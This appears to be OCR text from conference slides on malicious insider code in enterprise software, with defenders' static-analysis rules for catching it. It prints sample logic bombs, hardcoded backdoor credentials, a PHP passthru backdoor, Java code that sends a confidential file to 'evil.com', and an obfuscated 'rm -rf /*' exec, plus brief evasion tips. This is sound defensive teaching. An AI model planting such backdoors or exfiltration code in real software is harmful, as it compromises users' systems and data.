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2009 Computer Crime Survey 




43% of the 

companies 

surveyed 

attributed 

losses to 

malicious 

insiders 
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14th Annual CSI Computer Crime and Security Survey, CSI, Dec 2009 




Defining the Insider Threat 




Bishop/Gates classify malicious insider actions by: 



Violation of a security policy using legitimate access 
(misused privilege) 



and 



Violation of an access control policy by obtaining 
unauthorized access (ill-gotten privilege) 



8/24/10 Defining the Insider Threat, Bishop and Gates, CSIIRW08, May 2008 



We're Software People 




Forget IT people. What about developers? 




Motives 




Malicious insider's motivation 

■ Revenge 



Monetary gain 
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Finding Examples 




Open source and public disclosures 
Anonymized commercial/enterprise code 
2004 Obfuscated Voting contest (Stanford) 

■ Count votes correctly in test mode 

■ Favor one candidate during the real election 

■ Favoritism must be subtle and avoid attention 

■ Avoid detection by human code reviewers 
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Wysopal and Eng 

■ Static Detection of Application Backdoors 

Jeff Williams 

■ Enterprise Java Rootkits 

Bishop et al. 

■ We Have Met the Enemy and He Is Us 

■ Defining the Insider Threat 

CMU/CyLab 

■ Insider Threat Analysis Center 
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Classifying Well-Known Examples 




Medco (2008) 



if ( date > "April 23, 2005" ) 

delete all files on all 70 servers 



Linux (2005) 



if ((options == ( WCLONE | WALL)) && (current->uid = 0)) 



Borland's InterBase (2003) 



if ( username == "politically" and password == "correct") 
// Grant Access! 



Classes of Insider Threat 



1. Logic or Time Bomb 

2. Backdoors and Secret Credentials 

3. Nefarious Communication 

4. Dynamic Code Injection/Manipulation 

5. Obfuscation and Camouflage 



Malicious code lies dormant until triggered 
Most common insider threat 

■ Numerous public disclosers 

Examples 

■ Compare hardcoded data/time against current 



. Logic or Time Bombs in the News 




"Logic Bomb Wipes out 800 PCs in Norfolk VA" 

■ Medco admin gets 30 months for planting logic bomb 

"Logic Bomb 7 Hacker Gets 8 Years for Failed Stock Rigging" 

■ UBS employee tried to short-sell stock for profit 



"Fired Contractor Kisses Off Fannie Mae With Logic Bomb" 

■ Programmer fired for scripting error, writes error-free 
script logic bomb 



Example 1: 



long initTime = System. currentTimeMillis () ; 
if(initTime > 0xl291713454eL) { 
// Bypass control mechanisms 



Example 2: 



Date d = new Date(); 

Calendar cd = new GregorianCalendar ( ) ; 

cd.set(2009, 4, 1) ; 

Date d2 = cd. getTime ( ) ; 

if (d. compareTo (d2) > 0) { 

// Mess around. No obvious crash 




2. Backdoors and Secret Credentials 




Provide covert access to the system in the future 
Examples 

Code that allows remote access 
Adding credentials 
Adding a master password 
Bypassing normal authentication 
Execute commands (OS, queries, ...) 




2. Backdoors and Secret Credentials 




Borland's InterBase 



if ( username == "politically" and password == "correct") 
//Grant Access! 



WordPress backdoor 

if ($ GET["iz"]) { get theme mcommand ($ GET ["iz"] ) ; } 



Inserting credential at startup: 

stmt. executeQuery ("INSERT INTO Credentials 

VALUES (0, 'insider' , 'threat'); "); 




2. Backdoors and Secret Credentials 




Optix Pro (2004) 

■ Random-looking 38-character "master password" 
(kjui3498fjk34289890fwe334gfew4ger$"sdf) 

■ Encrypted in binary, decrypted in RAM 

■ Included for security reasons 

Subseven (2000) 

■ Backdoor with secret password 

■ Way to control what they've created 




3. Nefarious Communication 




Fixed communication channel to transfer 
data outside the perimeter / organization 

Excellent way to transfer sensitive information 

Examples 

■ Opening socket or other network connection 

■ Sending email or other communication 




3. Nefarious Communication 




Regularly transfer confidential files 



serversocket = new ServerSocket (666) ; 



socket = serversocket . accept () ; 

file = new File ("ConfidentialFile. txt") ; 

if (f ile . exists () ) { 

out = new PrintWriter (socket . getOutputStream () , true); 
fi = new FilelnputStream (f ile) ; 

reader = new Buff eredReader (new InputStreamReader (f i) ) ; 
String data; 

while ((data = reader . readLine () ) != null) { 
out. print (data + "\n") ; 

} 

out . close () ; 




3. Nefarious Communication 




Similar: Posting a confidential file to the Web 

url = new URL("http: //evil. com: 666/SomeDoFile.do") ; 

connection = (HttpURLConnection) url . openConnection ( ) ; 
connection . setRequestMethod ( "POST" ) ; 

//The file to send 

file = new java.io.File ("ConfidentialFile. txt") ; 

fi = new FilelnputStream (f ile) ; 
fi.read(the bytes); 



out = connection. getOutputStream () ; 
out . write ( the_by tes ) ; 

out . close ( ) ; 



int responseCode = connection . getResponseCode () ; //Send 




3. Nefarious Communication 




E-mail spying (Blackberry) 
"Performance update", but contained: 

smtp . sendMail ( "etisalat upgr@etisalat . ae" , subj , body) ; 



Insider-threat code deliberately included 



Changing, adding, or compiling code on the fly 
Examples 

■ Abuse of Reflection (rewriting read-only variables) 

■ Resource Rewriting (rewriting class and jar files) 

■ Runtime Compilation (compiling code at runtime) 

■ Class Loader Abuse (turn bytes in executable code) 



Credit to Jeff Williams, Enterprise Java Rootkits, BH 2009 




4. Dynamic Code Injection/Manipulation 




Example: Abuse of Reflection 

public static final String readOnlyKey = "..."; 



Field field = String. class . getDeclaredField ("value" ) ; 
field. setAccessible (true) ; 

field. set ("readOnlyKey" , "newKeyValue" . toCharArray) ; 



Credit to Jeff Williams, Enterprise Java Rootkits, BH 2009 




5. Obfuscation and Camouflage 




Hide malicious code from auditors 

■ Make code look real (be subtle) 
Linux case, make root: 

if ( (options==( WCLONEI WALL)) && (current->uid=0) ) 

Xll case, forgotten parenthesis, May 2006 

if (getuid() == | | geteuid != 0) { 

if ( ! strcmp (argv [i] , "-modulepath" ) ) { 




5. Obfuscation and Camouflage 




Example: decode a static string and execute it 
Original: 

Runtime . getRuntime (). exec ("rm -rf /*"); 

Obfuscated: 

String enc_cmd = "cm0glnJmIC8q" ; 

decoded = (new BASE64Encoder () ) .decodeBuf fer (enc_cmd) ; 

Runtime . getRuntime ( ) . exec (decoded) ; 




5. Obfuscation and Camouflage 




■ Usage of simple substitution cyphers 
(Rotl3, Four Square, Bifid, and Trifid Cypher, ...) 

String db = "Perqragvnyf " ; // Credentials in Rotl3 
String datal = "vafvqre"; // insider ... 
String data2 = "guerng"; // threat ... 

• • • 

db=Rot 13 .decode (db) ; 

• • • 

String queryStr = 

"INSERT INTO "+db+" VALUES (0 , ' "+datal+" ' , ' "+data2+" ' ) ; " ; 

• • • 

stmt . executeQuery (queryStr) ; 



INSERT INTO Credentials VALUES (0, 'insider 1 , 'threat'); 
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Techniques for Defenders 



Peer review 
Static analysis 

■ Out-of-the-box 

■ Custom rules 

Runtime testing 

■ Q A 

■ Production 

Results interpretation 



Obviously suspicious 

YzI5dHpxPTlzZGNzYWRjYXNkY2FzZGNhcztsZGNtYTtzbGRt 
YztsYWlzZGNsO21hc2RsbnNrRENBTEtTSkRDS0pMQVNEQ0 

After a week, you might spot: 

if ($_GET ["iz" ] ) { get_theme_mcommand($_GET ["iz"] ) ; } 

But what about? 



if ((options==( WCLONE | WALL)) && (current->uid=0) ) 




Static Analysis 




Problems with manual code review 

■ What to look for? 

■ Where to start? 



Static analysis can help, but requires 

■ New rules 

■ Different interpretation of the results 




Static Analysis: On the Inside 





Build 
Model 



Security 
Knowledge 




Perform 
Analysis 

i 




lCl.!j!jl 

Present 
Results 




Static Analysis: Out-of-the-Box 




Command Injection, SQL Injection, ... 
Example (WordPress): 

if ($ GET["iz"]) { get theme mcommand($ GET["iz"]); } 



function get_theme_mcommand ($mcds) { 
pass thru ($mcds) ; 



Static Analysis: Custom Rules 




A laid-off emp loyee installs code that reads the 
entire database>n a regular basis and sends the 



results over the network. 



Static Analysis: Custom Rules 




A laid-off emp loyee installs code that reads the 
entire database>n a regular basis and sends the 



results over the network. 



First: Grabbing the entire database is suspicious 
Broad-reaching static query: 

con. execute ("SELECT * FROM database"); 

Rule: Matches "(?i)select\s+\*\s+from\s+\w+" 




Static Analysis: Custom Rules 




A laid-off employee installs code that reads the 
entire database_oj]_a_tegular basis and sends the 
results ov^fthe network. 





Static Analysis: Custom Rules 




A laid-off employee installs code that reads the 
entire database_oj]_a_tegular basis and sends the 
results ov^fthe network. 




Second: Socket management is suspicious 
Creating a socket connection: 

ServerSocket srvr = 

new Java .net . ServerSocket (666) ; 

Rule: Hardcoded j ava . net . ServerSocket port 




Static Analysis: Custom Rules 




A laid-off employee in stalls code that reads the 
entire database on ^regular basj?^nd sends the 
results over the network. 




Static Analysis: Custom Rules 




A laid-off employee in stalls code that reads the 
entire database on ^regular basj?^nd sends the 
results over the network. 



Third: Mechanism to grab and compare time 
Checking the current time: 

initTime = System. currentTimeMillis () ; 

Rule: Calls to 

j ava . lang . System. currentTimeMillis ( ) 




Static Analysis: Custom Rules 




A laid-off employee in stalls code that reads the 
entire database on ^regular basj?^nd sends the 
results over the network. 



Third: Mechanism to grab and compare time 
Comparison with a hardcoded time: 

if (initTime > 0xl291713454eL) 

Rule: Time comparison with hardcoded values 




Runtime Testing: QA 



Extensive functional testing can help 

■ Dead code is interesting 
Monitor application critical places 

■ Queries executed against a DB 

■ Opening network connections 



Runtime Testing: Production 




Monitor for abnormal activity 

■ Unusual amounts of data 

■ Resurrecting "dead code" 

■ Anomalous queries and commands 

■ Connections to unusual ports/URLs/. 



Breadcrumbs, not smoking guns 
Example: 

long initTime = System. currentTimeMillis () ; 
if (initTime > 0xl291713454eL) 
//Code 

Found: Hard coded date comparisons 

■ Legit: Checking for updates 

■ Insider: Trigger for a logic bomb 



Order results based on strength of implication 
Example: date comparison 

■ Low: get the current time 

■ Medium: compare the current time 

■ High: compare the current time with hardcoded time 
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Face-Off 




Where we are today 

■ Rules for 17 insider threats issues in Java (next) 

■ Found multiple real issues in enterprise code 



The Face-Off: 

■ Rerun the examples 

■ Describe what to flag 



Insider Threat Categories 




1. Class Loader Abuse 



10. Overwritten Method 



2. Abuse of Reflection 



3. Runtime Compilation 



4. Credential Insertion 



5. E-Mail Spying 

6. Hidden Functionality 



7. Leaked Secret 



11. Password Bypass 

12. Process Flow Disruption 



13. Redundant Condition 



14. Resource Rewriting 

15. Static SQL Query 



16. Static Secret 



8. Logic Bomb 



17. Suspicious String 



9. Network Communication 



Classes of Insider Threat 



1. Logic or Time Bomb 

2. Backdoors and Secret Credentials 

3. Nefarious Communication 

4. Dynamic Code Injection/Manipulation 

5. Obfuscation and Camouflage 



Flag date comparisons as: 

■ Low priority: get the current time 

■ Medium priority: compare the current time 

■ High priority: to a hardcoded date 



Example 1: 



long initTime = System. currentTimeMillis () ; 
if (initTime > 0xl291713454eL) 

// Trigger 

// Update database to bypass control mechanisms 




2. Backdoors and Secret Credentials 




Flag all insertions in a db: 

■ Low: into the credential database 

■ Medium: hardcoded credentials 



High: 



at startup 



stmt.executeQuery ("INSERT INTO Credentials 

VALUES (0, 'insider' , 'threat'); "); 




2. Backdoors and Secret Credentials 




Report comparing hardcoded username and 
password (Borland InterBase): 

if ( username == "politically" and password == "correct") 

//Grant Access! 



Default command injection rules (WordPress) 



if ($ GET["iz"]) { get theme mcommand ( $ GET["iz"]); } 




3. Nefarious Communication 




1. Hardcoded port in new sockets 

2. Accessing a hardcoded file: 

serversocket = new ServerSocket (666) ; 



socket = srvr. accept () ; 

file = new File ("ConfidentialFile. txt") ; 

if (file .exists () ) { 

out = new PrintWriter (socket . getOutputStream () , true); 
fi = new FilelnputStream (f ile) ; 

reader = new Buff eredReader (new InputStreamReader (f i) ) ; 
String data; 

while ((data = reader . readLine () ) != null) { 
out .print (data + "\n"); 

} 

out . close () ; 




3. Nefarious Communication 




Flag hardcoded e-mail addresses (Blackberry): 



smtp . sendMail ("etisalat_upgr@etisalat.ae" , sub j , body); 



Flag functions (like Field. setAccessible () ) 

that can change read-only variables: 



public static final String readOnlyKey 



— n i» . 
... r 



Field field = String. class . getDeclaredField ( "value" ) ; 
field. setAccessible (true) ; 

field. set ("readOnlyKey", "newKeyValue" . toCharArray) ; 



Similar rules for categories in paper by Jeff 
Williams 
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xeditto Jeff Williams, Enterprise Java Rootkits, BH 




5. Obfuscation and Camouflage 




Flag use of equals (=) inside if statements 
(Root in Linux case): 

if ( (options==( WCLONE | WALL)) && (current->uid=0) ) 

Identify variables with the same name as 
common functions (Xll, forgotten parenthesis): 

if (getuidO == | | geteuid != 0) { 

if ( ! strcmp (argv [i] , "-modulepath") ) { 




5. Obfuscation and Camouflage 




Report decode operations on hardcoded strings: 

Example 1: 

String enc_cmd = n cm0gLXJmIHNvbWVfY3 JpdGl j YWxf ZGlyLyo=" ; 
decoded= (new BASE64Encoder ( ) ) .decodeBuf fer (enc_cmd) ; 

Runtime . getRuntime ( ) . exec (decoded) ; 

Example 2: 

String db = "Perqragvnyf " ; 
String datal = "vafvqre"; 
String data2 = "guerng"; 

• • • 

db=Rotl3 . decode (db) ; 



String queryStr = 

"INSERT INTO "+db+" VALUES (0, '"+datal+" ' , '"+data2+" ' ) ; " ; 
stmt .executeQuery (queryStr) ; 
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Avoid Getting Caught 



Make your code 

■ Look real 

■ As benign as possible 

Know your enemy 

■ Understand defenders' capabilities 

■ Use tools 

Don't do it! 



Catching Malicious Insiders 



Looking for a needle in a haystack 

■ Insiders have a big arsenal 

■ Simple, well-planned code is most popular 

Require a systematic approach 

■ Technology helps produce heatmap 

■ Auditors must have right mindset 
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